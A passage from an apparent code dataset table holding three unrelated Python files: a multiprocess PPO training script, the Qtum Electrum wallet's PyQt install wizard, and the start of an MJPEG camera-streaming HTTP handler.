source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
ppo_continuous_multiprocess.py | '''
Multi-processing for PPO continuous version 1
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical for make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 128 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 1. # if unnormalized, normalized action range should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][0] # choose the method for optimization
############################### PPO ####################################
class AddBias(nn.Module):
def __init__(self, bias):
super(AddBias, self).__init__()
self._bias = nn.Parameter(bias.unsqueeze(1))
def forward(self, x):
if x.dim() == 2:
bias = self._bias.t().view(1, -1)
else:
bias = self._bias.t().view(1, -1, 1, 1)
return x + bias
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
self.linear4.weight.data.uniform_(-init_w, init_w)
self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# implementation 1
# self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# # implementation 2: not dependent on latent features, reference:https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/master/a2c_ppo_acktr/distributions.py
self.log_std = AddBias(torch.zeros(num_actions))
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
mean = self.action_range * F.tanh(self.mean_linear(x))
# implementation 1
# log_std = self.log_std_linear(x)
# log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
# implementation 2
zeros = torch.zeros(mean.size())
if state.is_cuda:
zeros = zeros.cuda()
log_std = self.log_std(zeros)
return mean, log_std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, log_std = self.forward(state)
std = log_std.exp()
normal = Normal(mean, std)
action = normal.sample()
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
print(self.actor, self.critic)
def a_train(self, s, a, adv):
'''
Update policy network
:param s: state
:param a: action
:param adv: advantage
:return:
'''
mu, log_std = self.actor(s)
pi = Normal(mu, torch.exp(log_std))
mu_old, log_std_old = self.actor_old(s)
oldpi = Normal(mu_old, torch.exp(log_std_old))
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def update_old_pi(self):
'''
Update old policy parameter
:return: None
'''
for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
oldp.data.copy_(p)
def c_train(self, cumulative_r, s):
'''
Update actor network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def cal_adv(self, s, cumulative_r):
'''
Calculate advantage
:param s: state
:param cumulative_r: cumulative reward
:return: advantage
'''
advantage = cumulative_r - self.critic(s)
return advantage.detach()
def update(self, s, a, r):
'''
Update parameter with the constraint of KL divergent
:param s: state
:param a: act
:param r: reward
:return: None
'''
s = torch.FloatTensor(s).to(device)
a = torch.FloatTensor(a).to(device)
r = torch.FloatTensor(r).to(device)
self.update_old_pi()
adv = self.cal_adv(s, r)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv)
if kl > 4 * METHOD['kl_target']: # this in in google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
def choose_action(self, s):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
torch.save(self.actor_old.state_dict(), path+'_actor_old')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
self.actor.eval()
self.critic.eval()
self.actor_old.eval()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
buffer={
'state':[],
'action':[],
'reward':[]
}
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
buffer['state'].append(s)
buffer['action'].append(a)
# buffer['reward'].append(r)
buffer['reward'].append((r + 8) / 8) # normalize reward, find to be useful sometimes; from my experience, it works with 'penalty' version, while 'clip' verison works without this normalization
s = s_
ep_r += r
# update ppo
if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
if done:
v_s_=0
else:
v_s_ = ppo.get_v(s_)[0]
discounted_r = []
for r in buffer['reward'][::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
buffer['state'], buffer['action'], buffer['reward'] = [], [], []
ppo.update(bs, ba, br)
if done:
break
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.actor_old.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain shared and not shared
process.daemon=True # all processes closed when the main stops
processes.append(process)
[p.start() for p in processes]
while True: # keep geting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s))
if done:
break
if __name__ == '__main__':
main()
|
installwizard.py |
import sys
import threading
import os
import traceback
from PyQt5.QtCore import *
from qtum_electrum import Wallet, WalletStorage
from qtum_electrum.util import UserCancelled, InvalidPassword
from qtum_electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from qtum_electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n' \
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n' \
+ _(
"Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Qtum Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
else:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
# FIXME if we get here because of mistyped passphrase
# then that passphrase gets "cached"
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet()
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
# if self.opt_ext:
# options.append('ext')
# if self.opt_bip39:
# options.append('bip39')
title = _('Enter Seed')
if 'mobile' == self.wallet_type:
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n'),
_('This is compatible with qtum mobile wallet. \n')])
else:
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n'),
_('Qtum Electrum is not compatiable with qtum mobile wallet seed words yet. \n'),
_('You cannot restore your mobile wallet in Qtum Electrum for now.')])
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n) |
weboutput.py | # author: SIANA Systems
# website: https://www.siana-systems.com
from socketserver import ThreadingMixIn
from queue import Queue
from collections import deque
from threading import Thread
from http import HTTPStatus
from http.server import (
BaseHTTPRequestHandler,
HTTPServer
)
import numpy, cv2, time, urllib
from PIL import Image
class CameraHandler(BaseHTTPRequestHandler):
"""Handles HTTP requests from the clients. For this particular case,
server will return an image stream (.mjpg) when a client sends a GET
request
"""
image_queue = {}
stream_queue = {}
def do_GET(self):
"""Function called when the web browser generates a GET request
"""
decoded_path = urllib.parse.unquote(self.path)
if(decoded_path == '/'):
# Root path. Shows a list of all files
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(CameraHandler.populate_files().encode('utf-8'))
if decoded_path[1:] in CameraHandler.image_queue:
# Selected an existing picture
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'image/jpeg')
self.end_headers()
# send image...
_, jpg = cv2.imencode('.jpg', CameraHandler.image_queue[decoded_path[1:]])
self.wfile.write(jpg.tobytes())
if decoded_path[1:] in CameraHandler.stream_queue:
# Start mjpg stream
self.send_response(200)
# http header...
self.send_header('Age', 0)
self.send_header('Cache-Control', 'no-cache, private')
self.send_header('Pragma', 'no-cache')
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=frame')
self.end_headers()
# init blank image (first frame)
previous_image = numpy.zeros((640, 480, 3), numpy.uint8)
# stream frames...
while True:
try:
dequeued_image = CameraHandler.stream_queue[decoded_path[1:]].get(timeout=1000)
except:
dequeued_image = previous_image
try:
# convert cv2 image to jpeg
_, jpg = cv2.imencode('.JPG', dequeued_image)
# send frame http header...
self.wfile.write("--frame\r\n".encode("utf-8"))
self.send_header('Content-type', 'image/jpeg')
self.send_header('Content-length', str(jpg.size))
self.end_headers()
# send frame jpeg data...
self.wfile.write(jpg.tostring())
self.wfile.write(b'\r\n')
except (BrokenPipeError, ConnectionResetError):
# client closed connection => nothing to do!
pass
previous_image = dequeued_image
def populate_files():
"""Creates an HTML list where each element corresponds to an
image or video output
Returns:
